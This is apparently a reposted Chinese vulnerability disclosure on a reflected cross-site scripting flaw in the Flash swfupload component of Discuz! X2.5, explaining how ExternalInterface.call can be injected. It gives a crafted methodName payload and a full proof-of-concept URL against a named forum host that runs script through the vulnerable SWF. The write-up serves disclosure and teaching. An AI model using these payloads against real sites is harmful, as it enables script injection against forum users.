好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Flash应用安全系列[2]--Discuz! X2.5反射型跨站 - 网站

Discuz! X2.5某处Flash应用存在 漏洞 ,可能导致跨站脚本攻击。

上回我们说

 

flash.external.ExternalInterface.call($methodName, $parameter)

在浏览器中执行的是

 

try { __flash__toXML($methodName("$parameter")) ; } catch (e) { "<undefined/>";}

对于第一个传入的$methodName,flash player在输出js函数时是未经过任何编码的,上个例子里$methodName是全部可控的,但是我们知道了执行脚本的原理后,$methodName只需要部分可控,我们也可以通过注入特殊字符以达到执行任意JS代码的目的。比如

 

flash.external.ExternalInterface.call("object."+$methodName, $parameter)

$methodName = a())}catch(e){alert(/xss/)}//

结果是不存在object.a方法,跳到catch,执行我们构造的任意JS。

 

try { __flash__toXML(object.a())}catch(e){alert(/xss/)}//("$parameter")) ;}catch (e) { "<undefined/>"; }

 

这类xss的最有名的实例就是在去年年中爆出的Wordpress的xss,乌云上也有这个漏洞的分析( WooYun: WordPress反射型XSS )

杯具的是,Discuz! X2.5中采用了一个同样的一个swfupload模块,而且还是修复前的版本。

 

 

 

漏洞文件:upload\static\image\common\swfupload.swf

 

原始SWF下载:http://swfpoc.appspot测试数据/vul/discuz_swfupload.swf

 

http://bbs.open.qq测试数据/static/image/common/swfupload.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//

 

 

 

 

好多discuz x2.5的 论坛 ,好想一个一个提交。   

修复方案: 咦 你们官网的已经补丁了?补丁包里没有嘛。。。。

 

查看更多关于Flash应用安全系列[2]--Discuz! X2.5反射型跨站 - 网站的详细内容...

  阅读:53次